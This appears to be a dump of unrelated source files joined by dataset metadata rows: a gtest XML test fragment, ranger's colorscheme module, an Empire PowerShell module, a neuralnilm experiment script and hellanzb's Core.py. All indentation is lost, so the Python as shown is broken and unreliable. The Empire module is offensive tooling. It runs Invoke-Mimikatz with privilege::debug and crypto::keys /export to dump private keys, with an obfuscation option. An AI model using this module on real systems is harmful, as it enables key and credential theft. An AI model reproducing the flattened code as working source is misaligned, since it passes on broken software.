# hack when Chandler Carruth's libtool replacement tool is ready.
output_file_name1 = test_name + ".xml"
output_file1 = os.path.join(self.output_dir_, output_file_name1)
output_file_name2 = 'lt-' + output_file_name1
output_file2 = os.path.join(self.output_dir_, output_file_name2)
self.assert_(os.path.isfile(output_file1) or os.path.isfile(output_file2),
output_file1)
expected = minidom.parseString(expected_xml)
if os.path.isfile(output_file1):
actual = minidom.parse(output_file1)
else:
actual = minidom.parse(output_file2)
self.NormalizeXml(actual.documentElement)
self.AssertEquivalentNodes(expected.documentElement,
actual.documentElement)
expected.unlink()
actual.unlink()
if __name__ == "__main__":
os.environ["GTEST_STACK_TRACE_DEPTH"] = "0"
gtest_test_utils.Main()
| mit | -5,622,139,924,132,227,000 | 38.95 | 98 | 0.690685 | false |
swalladge/ranger | ranger/gui/colorscheme.py | 5 | 5568 | # This file is part of ranger, the console file manager.
# License: GNU GPL version 3, see the file "AUTHORS" for details.
"""Colorschemes define colors for specific contexts.
Generally, this works by passing a set of keywords (strings) to
the colorscheme.get() method to receive the tuple (fg, bg, attr).
fg, bg are the foreground and background colors and attr is the attribute.
The values are specified in ranger.gui.color.
A colorscheme must...
1. be inside either of these directories:
~/.config/ranger/colorschemes/
path/to/ranger/colorschemes/
2. be a subclass of ranger.gui.colorscheme.ColorScheme
3. implement a use(self, context) method which returns (fg, bg, attr).
context is a struct which contains all entries of CONTEXT_KEYS,
associated with either True or False.
Define which colorscheme in your settings (e.g. ~/.config/ranger/rc.conf):
set colorscheme yourschemename
"""
from __future__ import (absolute_import, division, print_function)
import os.path
from curses import color_pair
import ranger
from ranger.gui.color import get_color
from ranger.gui.context import Context
from ranger.core.main import allow_access_to_confdir
from ranger.ext.cached_function import cached_function
from ranger.ext.iter_tools import flatten
class ColorSchemeError(Exception):
pass
class ColorScheme(object):
"""This is the class that colorschemes must inherit from.
    It defines the get() method, which returns the color tuple
    that fits the given keys.
"""
@cached_function
def get(self, *keys):
"""Returns the (fg, bg, attr) for the given keys.
Using this function rather than use() will cache all
colors for faster access.
"""
context = Context(keys)
color = self.use(context)
if len(color) != 3 or not all(isinstance(value, int) for value in color):
raise ValueError("Bad Value from colorscheme. Need "
"a tuple of (foreground_color, background_color, attribute).")
return color
@cached_function
def get_attr(self, *keys):
"""Returns the curses attribute for the specified keys
Ready to use for curses.setattr()
"""
fg, bg, attr = self.get(*flatten(keys))
return attr | color_pair(get_color(fg, bg))
@staticmethod
def use(_):
"""Use the colorscheme to determine the (fg, bg, attr) tuple.
Override this method in your own colorscheme.
"""
return (-1, -1, 0)
def _colorscheme_name_to_class(signal): # pylint: disable=too-many-branches
# Find the colorscheme. First look in ~/.config/ranger/colorschemes,
# then at RANGERDIR/colorschemes. If the file contains a class
# named Scheme, it is used. Otherwise, an arbitrary other class
# is picked.
if isinstance(signal.value, ColorScheme):
return
if not signal.value:
signal.value = 'default'
scheme_name = signal.value
usecustom = not ranger.args.clean
def exists(colorscheme):
return os.path.exists(colorscheme + '.py') or os.path.exists(colorscheme + '.pyc')
def is_scheme(cls):
try:
return issubclass(cls, ColorScheme)
except TypeError:
return False
# create ~/.config/ranger/colorschemes/__init__.py if it doesn't exist
if usecustom:
if os.path.exists(signal.fm.confpath('colorschemes')):
initpy = signal.fm.confpath('colorschemes', '__init__.py')
if not os.path.exists(initpy):
open(initpy, 'a').close()
if usecustom and \
exists(signal.fm.confpath('colorschemes', scheme_name)):
scheme_supermodule = 'colorschemes'
elif exists(signal.fm.relpath('colorschemes', scheme_name)):
scheme_supermodule = 'ranger.colorschemes'
usecustom = False
else:
scheme_supermodule = None # found no matching file.
if scheme_supermodule is None:
if signal.previous and isinstance(signal.previous, ColorScheme):
signal.value = signal.previous
else:
signal.value = ColorScheme()
raise ColorSchemeError("Cannot locate colorscheme `%s'" % scheme_name)
else:
if usecustom:
allow_access_to_confdir(ranger.args.confdir, True)
scheme_module = getattr(
__import__(scheme_supermodule, globals(), locals(), [scheme_name], 0), scheme_name)
if usecustom:
allow_access_to_confdir(ranger.args.confdir, False)
if hasattr(scheme_module, 'Scheme') and is_scheme(scheme_module.Scheme):
signal.value = scheme_module.Scheme()
else:
for var in scheme_module.__dict__.values():
if var != ColorScheme and is_scheme(var):
signal.value = var()
break
else:
raise ColorSchemeError("The module contains no valid colorscheme!")
def get_all_colorschemes(fm):
colorschemes = set()
# Load colorscheme names from main ranger/colorschemes dir
for item in os.listdir(os.path.join(ranger.RANGERDIR, 'colorschemes')):
if not item.startswith('__'):
colorschemes.add(item.rsplit('.', 1)[0])
# Load colorscheme names from ~/.config/ranger/colorschemes if dir exists
confpath = fm.confpath('colorschemes')
if os.path.isdir(confpath):
for item in os.listdir(confpath):
if not item.startswith('__'):
colorschemes.add(item.rsplit('.', 1)[0])
return list(sorted(colorschemes))
| gpl-3.0 | -5,530,726,037,153,921,000 | 34.240506 | 95 | 0.65194 | false |
adaptivethreat/Empire | lib/modules/powershell/credentials/mimikatz/keys.py | 7 | 2569 | from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-Mimikatz DumpKeys',
'Author': ['@JosephBialek', '@gentilkiwi'],
'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
"to extract all keys to the local directory."),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : True,
'OpsecSafe' : True,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [
'http://clymb3r.wordpress.com/',
'http://blog.gentilkiwi.com'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
# add in the key dumping command
scriptEnd = """Invoke-Mimikatz -Command 'crypto::capi privilege::debug crypto::cng "crypto::keys /export"' """
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
| bsd-3-clause | -3,643,933,511,273,116,700 | 31.935897 | 118 | 0.543013 | false |
mmottahedi/neuralnilm_prototype | scripts/e311.py | 2 | 5625 | from __future__ import print_function, division
import matplotlib
import logging
from sys import stdout
matplotlib.use('Agg') # Must be before importing matplotlib.pyplot or pylab!
from neuralnilm import (Net, RealApplianceSource,
BLSTMLayer, DimshuffleLayer,
BidirectionalRecurrentLayer)
from neuralnilm.source import standardise, discretize, fdiff, power_and_fdiff
from neuralnilm.experiment import run_experiment, init_experiment
from neuralnilm.net import TrainingError
from neuralnilm.layers import MixtureDensityLayer
from neuralnilm.objectives import scaled_cost, mdn_nll, scaled_cost_ignore_inactive, ignore_inactive
from neuralnilm.plot import MDNPlotter
from lasagne.nonlinearities import sigmoid, rectify, tanh
from lasagne.objectives import mse
from lasagne.init import Uniform, Normal
from lasagne.layers import (LSTMLayer, DenseLayer, Conv1DLayer,
ReshapeLayer, FeaturePoolLayer, RecurrentLayer)
from lasagne.updates import nesterov_momentum, momentum
from functools import partial
import os
import __main__
from copy import deepcopy
from math import sqrt
import numpy as np
import theano.tensor as T
NAME = os.path.splitext(os.path.split(__main__.__file__)[1])[0]
PATH = "/homes/dk3810/workspace/python/neuralnilm/figures"
SAVE_PLOT_INTERVAL = 250
GRADIENT_STEPS = 100
SEQ_LENGTH = 512
source_dict = dict(
filename='/data/dk3810/ukdale.h5',
appliances=[
['fridge freezer', 'fridge', 'freezer'],
'hair straighteners',
'television'
# 'dish washer',
# ['washer dryer', 'washing machine']
],
max_appliance_powers=[300, 500, 200, 2500, 2400],
on_power_thresholds=[5] * 5,
max_input_power=5900,
min_on_durations=[60, 60, 60, 1800, 1800],
min_off_durations=[12, 12, 12, 1800, 600],
window=("2013-06-01", "2014-07-01"),
seq_length=SEQ_LENGTH,
output_one_appliance=False,
boolean_targets=False,
train_buildings=[1],
validation_buildings=[1],
skip_probability=0.0,
n_seq_per_batch=16,
subsample_target=4,
include_diff=False,
clip_appliance_power=True,
target_is_prediction=False,
independently_center_inputs = True,
standardise_input=True,
unit_variance_targets=True,
input_padding=0,
lag=0,
# reshape_target_to_2D=True,
input_stats={'mean': np.array([ 0.05526326], dtype=np.float32),
'std': np.array([ 0.12636775], dtype=np.float32)},
target_stats={
'mean': np.array([ 0.04066789, 0.01881946,
0.24639061, 0.17608672, 0.10273963],
dtype=np.float32),
'std': np.array([ 0.11449792, 0.07338708,
0.26608968, 0.33463112, 0.21250485],
dtype=np.float32)}
)
N = 50
net_dict = dict(
save_plot_interval=SAVE_PLOT_INTERVAL,
# loss_function=partial(ignore_inactive, loss_func=mdn_nll, seq_length=SEQ_LENGTH),
# loss_function=lambda x, t: mdn_nll(x, t).mean(),
loss_function=lambda x, t: mse(x, t).mean(),
# loss_function=partial(scaled_cost, loss_func=mse),
updates_func=momentum,
learning_rate=1e-2,
learning_rate_changes_by_iteration={
# 500: 5e-06
# 4000: 1e-03,
# 6000: 5e-06,
# 7000: 1e-06
# 2000: 5e-06
# 3000: 1e-05
# 7000: 5e-06,
# 10000: 1e-06,
# 15000: 5e-07,
# 50000: 1e-07
},
do_save_activations=True
# plotter=MDNPlotter
)
def exp_a(name):
# 3 appliances
global source
source_dict_copy = deepcopy(source_dict)
source = RealApplianceSource(**source_dict_copy)
net_dict_copy = deepcopy(net_dict)
net_dict_copy.update(dict(
experiment_name=name,
source=source
))
N = 25
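    # architecture: bidirectional RNN -> max pool over time (factor 4, matching subsample_target) -> bidirectional RNN -> dense softplus output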
net_dict_copy['layers_config'] = [
{
'type': BidirectionalRecurrentLayer,
'num_units': N,
'gradient_steps': GRADIENT_STEPS,
'W_in_to_hid': Normal(std=1.),
'nonlinearity': tanh
},
{
'type': FeaturePoolLayer,
            'ds': 4, # pool size: number of consecutive time steps pooled together (matches subsample_target)
'axis': 1, # pool over the time axis
'pool_function': T.max
},
{
'type': BidirectionalRecurrentLayer,
'num_units': N,
'gradient_steps': GRADIENT_STEPS,
'W_in_to_hid': Normal(std=1/sqrt(N)),
'nonlinearity': tanh
},
{
'type': DenseLayer,
'num_units': source.n_outputs,
'W': Normal(std=1/sqrt(N)),
'nonlinearity': T.nnet.softplus
}
# {
# 'type': MixtureDensityLayer,
# 'num_units': source.n_outputs,
# 'num_components': 1,
# 'nonlinearity_mu': T.nnet.softplus
# }
]
net = Net(**net_dict_copy)
return net
def main():
# EXPERIMENTS = list('abcdefghijklmnopqrstuvwxyz')
EXPERIMENTS = list('a')
for experiment in EXPERIMENTS:
full_exp_name = NAME + experiment
func_call = init_experiment(PATH, experiment, full_exp_name)
logger = logging.getLogger(full_exp_name)
try:
net = eval(func_call)
run_experiment(net, epochs=None)
except KeyboardInterrupt:
logger.info("KeyboardInterrupt")
break
except Exception as exception:
logger.exception("Exception")
raise
finally:
logging.shutdown()
if __name__ == "__main__":
main()
| mit | -267,956,758,731,910,050 | 31.142857 | 100 | 0.600711 | false |
myusuf3/hellanzb | Hellanzb/Core.py | 1 | 24219 | """
Core - All of our main()ish functions. Initialization/shutdown/etc
(c) Copyright 2005 Philip Jenvey, Ben Bangert
[See end of file]
"""
# Install our custom twisted reactor immediately
from Hellanzb.HellaReactor import HellaReactor
HellaReactor.install()
import optparse, os, signal, sys, time, thread, threading, Hellanzb, Hellanzb.PostProcessor
from distutils import spawn
from shutil import rmtree
from socket import gethostname
from threading import Lock
from twisted.internet import reactor
from Hellanzb.Daemon import initDaemon, postProcess
from Hellanzb.HellaXMLRPC import hellaRemote, initXMLRPCClient
from Hellanzb.Log import *
from Hellanzb.Logging import initLogging, stdinEchoOn
from Hellanzb.PostProcessorUtil import defineMusicType
from Hellanzb.Util import *
__id__ = '$Id: Core.py 1053 2007-03-23 21:44:14Z pjenvey $'
def findAndLoadConfig(optionalConfigFile = None):
""" Find and load the configuration file """
if optionalConfigFile is not None:
if loadConfig(optionalConfigFile):
Hellanzb.CONFIG_FILENAME = optionalConfigFile
return
else:
error('Unable to load specified config file: ' + optionalConfigFile)
sys.exit(1)
# look for conf in this order: sys.prefix, ./, or ./etc/
confDirs = [os.path.join(sys.prefix, 'etc')]
try:
confDirs.append(os.path.join(os.getcwd(), 'etc'))
confDirs.append(os.getcwd())
except OSError, ose:
if ose.errno != 2:
raise
# OSError: [Errno 2] No such file or directory. cwd doesn't exist
# hard coding preferred Darwin config file location, kind of lame. but I'd rather do
    # this than make an etc dir in os x's Python.framework directory
if Hellanzb.SYSNAME == "Darwin":
confDirs[0] = '/opt/local/etc'
for dir in confDirs:
file = os.path.join(dir, 'hellanzb.conf')
if loadConfig(file):
Hellanzb.CONFIG_FILENAME = file
return
error('Could not find configuration file in the following dirs: ' + str(confDirs))
sys.exit(1)
def loadConfig(fileName):
""" Attempt to load the specified config file. If successful, clean the variables/data the
config file has setup """
if not os.path.isfile(fileName):
return False
if not os.access(fileName, os.R_OK):
warn('Unable to read config file: ' + fileName)
return False
try:
execfile(fileName)
# Cache this operation (whether or not we're in debug mode) for faster (hardly)
# debug spamming (from NZBLeecher)
if hasattr(Hellanzb, 'DEBUG_MODE') and Hellanzb.DEBUG_MODE is not None and \
Hellanzb.DEBUG_MODE != False:
# Set this ASAP for sane logging. FIXME: You could possibly lose some debug
# output during initialization if you're using the -d option
Hellanzb.DEBUG_MODE_ENABLED = True
# Ensure the types are lower case
for varName in ('NOT_REQUIRED_FILE_TYPES', 'KEEP_FILE_TYPES'):
types = getattr(Hellanzb, varName)
lowerTypes = [ext.lower() for ext in types]
setattr(Hellanzb, varName, lowerTypes)
if not hasattr(Hellanzb, 'MAX_RATE') or Hellanzb.MAX_RATE is None:
Hellanzb.MAX_RATE = 0
else:
Hellanzb.MAX_RATE = int(Hellanzb.MAX_RATE)
if not hasattr(Hellanzb, 'UNRAR_CMD') or Hellanzb.UNRAR_CMD is None:
Hellanzb.UNRAR_CMD = assertIsExe(['rar', 'unrar'])
else:
Hellanzb.UNRAR_CMD = assertIsExe([Hellanzb.UNRAR_CMD])
if not hasattr(Hellanzb, 'PAR2_CMD') or Hellanzb.PAR2_CMD is None:
Hellanzb.PAR2_CMD = assertIsExe(['par2'])
else:
Hellanzb.PAR2_CMD = assertIsExe([Hellanzb.PAR2_CMD])
if not hasattr(Hellanzb, 'MACBINCONV_CMD') or Hellanzb.MACBINCONV_CMD is None:
# macbinconv is optional when not explicitly specified in the conf
Hellanzb.MACBINCONV_CMD = None
try:
Hellanzb.MACBINCONV_CMD = assertIsExe(['macbinconv'])
except FatalError:
pass
else:
Hellanzb.MACBINCONV_CMD = assertIsExe([Hellanzb.MACBINCONV_CMD])
if not hasattr(Hellanzb, 'SKIP_UNRAR') or Hellanzb.SKIP_UNRAR is None:
Hellanzb.SKIP_UNRAR = False
if not hasattr(Hellanzb, 'SMART_PAR'):
Hellanzb.SMART_PAR = True
if not hasattr(Hellanzb, 'CATEGORIZE_DEST'):
Hellanzb.CATEGORIZE_DEST = True
if not hasattr(Hellanzb, 'NZB_ZIPS'):
Hellanzb.NZB_ZIPS = '.nzb.zip'
if not hasattr(Hellanzb, 'NZB_GZIPS'):
Hellanzb.NZB_GZIPS = '.nzb.gz'
if not hasattr(Hellanzb, 'DISABLE_COLORS'):
Hellanzb.DISABLE_COLORS = False
if not hasattr(Hellanzb, 'DISABLE_ANSI'):
Hellanzb.DISABLE_ANSI = False
Hellanzb.CACHE_LIMIT = unPrettyBytes(getattr(Hellanzb, 'CACHE_LIMIT', 0))
if not hasattr(Hellanzb, 'OTHER_NZB_FILE_TYPES'):
# By default, just match .nzb files in the queue dir
Hellanzb.NZB_FILE_RE = re.compile(r'(?i)\.(nzb)$')
else:
nzbTypeRe = r'(?i)\.(%s)$'
if not isinstance(Hellanzb.OTHER_NZB_FILE_TYPES, list):
Hellanzb.OTHER_NZB_FILE_TYPES = [Hellanzb.OTHER_NZB_FILE_TYPES]
if 'nzb' not in Hellanzb.OTHER_NZB_FILE_TYPES:
Hellanzb.OTHER_NZB_FILE_TYPES.append('nzb')
typesStr = '|'.join(Hellanzb.OTHER_NZB_FILE_TYPES)
Hellanzb.NZB_FILE_RE = re.compile(nzbTypeRe % typesStr)
# Make sure we expand pathnames so that ~ can be used
for expandPath in ('PREFIX_DIR', 'QUEUE_DIR', 'DEST_DIR', 'POSTPONED_DIR',
'CURRENT_DIR', 'TEMP_DIR', 'PROCESSING_DIR', 'STATE_XML_FILE',
'WORKING_DIR', 'LOG_FILE', 'DEBUG_MODE',
'UNRAR_CMD', 'PAR2_CMD', 'MACBINCONV_CMD',
'EXTERNAL_HANDLER_SCRIPT'):
if hasattr(Hellanzb, expandPath):
thisDir = getattr(Hellanzb, expandPath)
if thisDir is not None:
expandedDir = os.path.expanduser(thisDir)
setattr(Hellanzb, expandPath, expandedDir)
if not hasattr(Hellanzb, 'EXTERNAL_HANDLER_SCRIPT') or \
Hellanzb.EXTERNAL_HANDLER_SCRIPT is None or \
not os.path.isfile(Hellanzb.EXTERNAL_HANDLER_SCRIPT) or \
not os.access(Hellanzb.EXTERNAL_HANDLER_SCRIPT, os.X_OK):
Hellanzb.EXTERNAL_HANDLER_SCRIPT = None
debug('Found config file in directory: ' + os.path.dirname(fileName))
return True
except FatalError, fe:
error('A problem occurred while reading the config file', fe)
raise
except Exception, e:
msg = 'An unexpected error occurred while reading the config file'
error(msg, e)
raise
# FIXME I think due to the recent change that shutdown()s, then logs -- logShutdown can be
# replaced with normal logging calls
def signalHandler(signum, frame):
""" The main and only signal handler. Handle cleanup/managing child processes before
exiting """
# CTRL-C
if signum == signal.SIGINT:
        # If there aren't any processes to wait for, exit immediately
if len(Topen.activePool) == 0:
shutdown(message = 'Caught interrupt, exiting..')
return
# We can safely exit ASAP if all the processes are associated with the main thread
        # (the thread processes? seem to have already gotten the signal as well at
# this point. I'm not exactly sure why)
threadsOutsideMain = False
for topen in Topen.activePool:
if topen.threadIdent != Hellanzb.MAIN_THREAD_IDENT:
threadsOutsideMain = True
if not threadsOutsideMain:
shutdown(message = 'Caught interrupt, exiting..')
return
# We couldn't cheat our way out of the program, tell the user the processes
# (threads) we're waiting on, and wait for another signal
if Hellanzb.stopSignalCount == 0 or (time.time() - Hellanzb.firstSignal > 5):
Hellanzb.firstSignal = time.time()
Hellanzb.stopSignalCount = 1
else:
Hellanzb.stopSignalCount = Hellanzb.stopSignalCount + 1
if Hellanzb.stopSignalCount < 2:
msg = 'Caught interrupt, waiting for these child processes to finish:\n'
for topen in Topen.activePool:
pid = topen.getPid()
if pid is None:
pid = 'Init'
else:
pid = str(pid)
msg += truncateToMultiLine(topen.prettyCmd, length = 68,
prefix = pid + ' ', indentPrefix = ' '*8) + '\n'
msg += '(CTRL-C again within 5 seconds to kill them and exit immediately.\n' + \
'PostProcessors will automatically resume when hellanzb is restarted)'
warn(msg)
else:
# Kill the processes. If any processes are lying around after a kill -9, it's
# either an o/s problem (we don't care) or a bug in hellanzb (we aren't
# allowing the process to exit/still reading from it)
warn('Killing child processes..')
shutdown(message = 'Killed all child processes, exiting..',
killPostProcessors = True)
return
def init(options = {}):
""" initialize the app """
# Whether or not the app is in the process of shutting down
Hellanzb.SHUTDOWN = False
# Get logging going ASAP
initLogging()
# CTRL-C shutdown return code
Hellanzb.SHUTDOWN_CODE = 20
# defineServer's from the config file
Hellanzb.SERVERS = {}
# we can compare the current thread's ident to our MAIN_THREAD's to determine whether
# or not we may need to route things through twisted's callFromThread
Hellanzb.MAIN_THREAD_IDENT = thread.get_ident()
Hellanzb.BEGIN_TIME = time.time()
# Whether or not the downloader has been paused
Hellanzb.downloadPaused = False
# Troll threads
Hellanzb.postProcessors = []
Hellanzb.postProcessorLock = Lock()
# How many total NZB archives have been post processed
Hellanzb.totalPostProcessed = 0
# Whether or not we're a downloader process
Hellanzb.IS_DOWNLOADER = False
# Whether or not the queue daemon is running as a daemon process (forked)
Hellanzb.DAEMONIZE = False
# Whether or not debug logging is enabled
Hellanzb.DEBUG_MODE_ENABLED = False
# How many times CTRL-C has been pressed
Hellanzb.stopSignalCount = 0
# When the first CTRL-C was pressed
Hellanzb.firstSignal = None
# Message printed before exiting
Hellanzb.shutdownMessage = None
# Whether or not this is a hellanzb download daemon process
Hellanzb.isDaemon = False
# Whether or not we're currently downloading an NZB
Hellanzb.downloading = False
# The name of the loaded config file
Hellanzb.CONFIG_FILENAME = None
# hostname we're running on
Hellanzb.HOSTNAME = gethostname()
if isWindows():
Hellanzb.SYSNAME = None
else:
(sysname, nodename, release, version, machine) = os.uname()
# The OS in use
Hellanzb.SYSNAME = sysname
    # Only add anonymous NZB files placed in the QUEUE_DIR to the NZBQueue after this
    # number of seconds has passed since the file's modification time
Hellanzb.NZBQUEUE_MDELAY = 10
# Whether or not the C yenc module is installed
try:
import _yenc
Hellanzb.HAVE_C_YENC = True
except ImportError:
Hellanzb.HAVE_C_YENC = False
Hellanzb.PACKAGER = find_packager()
if isPy2App():
# Append the py2app Contents/Resources dir to the PATH
import __main__
os.environ['PATH'] = os.environ['PATH'] + ':' + \
os.path.dirname(os.path.abspath(__main__.__file__))
# Twisted will replace this with its own signal handler when initialized
signal.signal(signal.SIGINT, signalHandler)
outlineRequiredDirs() # before the config file is loaded
if hasattr(options, 'configFile') and options.configFile is not None:
findAndLoadConfig(options.configFile)
else:
findAndLoadConfig()
# FIXME: these blocks below, and some code in loadConfig should all be pulled out into
# a post-loadConfig normalizeConfig function. Could we skip any of this init stuff
# when just making an RPC call (to reduce startup time)?
for attr in ('logFile', 'debugLogFile'):
# this is really: logFile = None
setattr(sys.modules[__name__], attr, None)
if hasattr(options, attr) and getattr(options, attr) is not None:
setattr(sys.modules[__name__], attr, getattr(options, attr))
Hellanzb.Logging.initLogFile(logFile = logFile, debugLogFile = debugLogFile)
# overwrite xml rpc vars from the command line options if they were set
for option, attr in { 'rpcServer': 'XMLRPC_SERVER',
'rpcPassword': 'XMLRPC_PASSWORD',
'rpcPort': 'XMLRPC_PORT' }.iteritems():
if hasattr(options, option) and getattr(options, option) is not None:
setattr(Hellanzb, attr, getattr(options, option))
if not hasattr(Hellanzb, 'DELETE_PROCESSED'):
Hellanzb.DELETE_PROCESSED = True
if hasattr(Hellanzb, 'UMASK'):
try:
Hellanzb.UMASK = int(Hellanzb.UMASK)
except ValueError:
error('Config file option: Hellanzb.UMASK is not a valid integer')
sys.exit(1)
if not hasattr(Hellanzb, 'LIBNOTIFY_NOTIFY'):
Hellanzb.LIBNOTIFY_NOTIFY = False
elif Hellanzb.LIBNOTIFY_NOTIFY:
try:
import pynotify
except ImportError:
error('Please install notify-python or disable Hellanzb.LIBNOTIFY_NOTIFY')
sys.exit(1)
if not pynotify.init('hellanzb'):
error('Cannot initialize libnotify')
sys.exit(1)
if not hasattr(Hellanzb, 'GROWL_NOTIFY'):
error('Required option not defined in config file: Hellanzb.GROWL_NOTIFY')
sys.exit(1)
elif Hellanzb.GROWL_NOTIFY:
errors = []
for attr in ('GROWL_SERVER', 'GROWL_PASSWORD'):
if not hasattr(Hellanzb, attr):
err = 'Hellanzb.GROWL_NOTIFY enabled. Required option not defined in config file: Hellanzb.'
errors.append(err + attr)
if len(errors):
[error(err) for err in errors]
sys.exit(1)
def outlineRequiredDirs():
""" Set all required directory attrs to None. they will be checked later for this value to
ensure they have been set """
requiredDirs = [ 'PREFIX', 'QUEUE', 'DEST', 'CURRENT', 'WORKING',
'POSTPONED', 'PROCESSING', 'TEMP' ]
for dir in requiredDirs:
setattr(Hellanzb, dir + '_DIR', None)
def shutdown(killPostProcessors = False, message = None):
""" Turn the knob that tells all parts of the program we're shutting down, optionally kill
any sub processes (that could prevent the program from exiting) and kill the twisted
reactor """
if Hellanzb.SHUTDOWN:
# shutdown already triggered
return
    # the knob that threads (PostProcessors) will check before doing significant work
Hellanzb.SHUTDOWN = True
if killPostProcessors:
# However PostProcessors may be running sub-processes, which are all kill -9ed
# here
Topen.killAll()
if not getattr(Hellanzb, 'shutdownMessage', None):
Hellanzb.shutdownMessage = message
# stop the twisted reactor
if reactor.running:
# hellanzb downloader processes will call finishShutdown after reactor.run has
# completed (it has to: because the system event trigger below does NOT ensure
# finishShutdown is called in the final reactor iteration)
if not Hellanzb.IS_DOWNLOADER:
reactor.addSystemEventTrigger('after', 'shutdown', finishShutdown)
reactor.stop()
else:
finishShutdown()
def finishShutdown():
""" Last minute calls prior to shutdown """
# Just in case we left it off
stdinEchoOn()
if hasattr(Hellanzb, 'DOWNLOAD_TEMP_DIR'):
# Remove the temporary files with the encoded data. Any errors causing hellanzb to
# shut down prematurely (like can't bind to specific port -- maybe another
# hellanzb is running?) should unset this var so this doesn't get called
try:
rmtree(Hellanzb.DOWNLOAD_TEMP_DIR)
except OSError:
pass
if hasattr(Hellanzb, 'DEQUEUED_NZBS_DIR'):
rmtree(Hellanzb.DEQUEUED_NZBS_DIR)
if Hellanzb.shutdownMessage:
logShutdown(Hellanzb.shutdownMessage)
def shutdownAndExit(returnCode = 0, message = None):
""" Shutdown hellanzb's twisted reactor, AND call sys.exit """
shutdown(killPostProcessors = True, message = message)
sys.exit(returnCode)
def marquee():
""" Print a simple header, for when starting the app """
info('', saveRecent = False)
msg = 'hellanzb v' + Hellanzb.version
options = ['config = %s' % Hellanzb.CONFIG_FILENAME]
if Hellanzb.DAEMONIZE:
options.append('daemonized')
if Hellanzb.HAVE_C_YENC:
options.append('C yenc module')
if Hellanzb.MACBINCONV_CMD is not None:
options.append('MacBinary')
optionLen = len(options)
msg += ' (%s)' % ', '.join(options)
info(msg)
debug(msg)
USAGE = """
hellanzb version %s
""".lstrip() + cmHella().rstrip() + \
"""
nzb downloader and post processor
http://www.hellanzb.com
usage: %s [options] [remote-call] [remote-call-options]
hellanzb will by default (no remote-call specified) start its one and only
queue daemon. Specifying a remote call will attempt to talk to that already
running queue daemon via XML-RPC.
remote-calls (via XML-RPC):
%s
""".rstrip()
def parseArgs():
""" Parse the command line args """
# prevent optparse from totally munging usage
formatter = optparse.IndentedHelpFormatter()
formatter.format_usage = lambda usage: usage
# Initialize this here, so we can probe it for xml rpc client commands in the usage
initXMLRPCClient()
from Hellanzb.HellaXMLRPC import RemoteCall
usage = USAGE % (str(Hellanzb.version), '%prog', RemoteCall.allUsage())
parser = optparse.OptionParser(formatter = formatter, usage = usage, version = Hellanzb.version)
parser.add_option('-c', '--config', type='string', dest='configFile',
help='specify the configuration file')
parser.add_option('-l', '--log-file', type='string', dest='logFile',
help='specify the log file (overwrites the Hellanzb.LOG_FILE config file setting)')
parser.add_option('-d', '--debug-file', type='string', dest='debugLogFile',
help='specify the debug log file (turns on debugging output/overwrites the ' + \
'Hellanzb.DEBUG_MODE config file setting)')
if not isWindows():
parser.add_option('-D', '--daemon', action='store_true', dest='daemonize',
help='run hellanzb as a daemon process (fork and exit)')
#parser.add_option('-n', '--just-download-nzb', type='string', dest='justDownload',
# help='download the specified nzb and exit the program (do not post process)')
parser.add_option('-p', '--post-process-dir', type='string', dest='postProcessDir',
help='post-process the specified nzb archive dir either in an already running hellanzb' + \
' (via xmlrpc) if one is available, otherwise in the current process. then exit')
parser.add_option('-P', '--rar-password', type='string', dest='rarPassword',
help='when used with the -p option, specifies the nzb archive\'s rar password')
parser.add_option('-L', '--local-post-process', action='store_true', dest='localPostProcess',
help='when used with the -p option, do the post processing work in the current ' + \
'process (do not attempt to contact an already running queue daemon)')
parser.add_option('-r', '--rpc-server', type='string', dest='rpcServer',
help='specify the rpc server hostname (overwrites Hellanzb.XMLRPC_SERVER config file setting)')
parser.add_option('-s', '--rpc-password', type='string', dest='rpcPassword',
help='specify the rpc server password (overwrites Hellanzb.XMLRPC_PASSWORD config file setting)')
parser.add_option('-t', '--rpc-port', type='int', dest='rpcPort',
help='specify the rpc server port (overwrites Hellanzb.XMLRPC_PORT config file setting)')
return parser.parse_args()
def processArgs(options, args):
""" By default (no args) run the daemon. Otherwise we could be making an XML RPC call, or
calling a PostProcessor on the specified dir then exiting """
if not len(args) and not options.postProcessDir:
Hellanzb.IS_DOWNLOADER = True
if getattr(options, 'daemonize', False):
# Run as a daemon process (fork)
Hellanzb.DAEMONIZE = True
marquee()
initDaemon()
elif options.postProcessDir and options.localPostProcess:
marquee()
reactor.callLater(0, postProcess, options)
reactor.run()
else:
try:
hellaRemote(options, args)
except SystemExit:
# sys.exit throws this, let it go
raise
except FatalError, fe:
error('Exiting', fe)
shutdownAndExit(1)
except Exception, e:
error('An unexpected problem occurred, exiting', e)
shutdown()
raise
def main():
""" Program main loop. Always called from the main thread """
options, args = parseArgs()
try:
init(options)
except SystemExit:
# sys.exit throws this, let it go
raise
except FatalError, fe:
error('Exiting', fe)
shutdownAndExit(1)
except Exception, e:
error('An unexpected problem occurred, exiting', e)
shutdown()
raise
processArgs(options, args)
"""
Copyright (c) 2005 Philip Jenvey <[email protected]>
Ben Bangert <[email protected]>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. The name of the author or contributors may not be used to endorse or
promote products derived from this software without specific prior
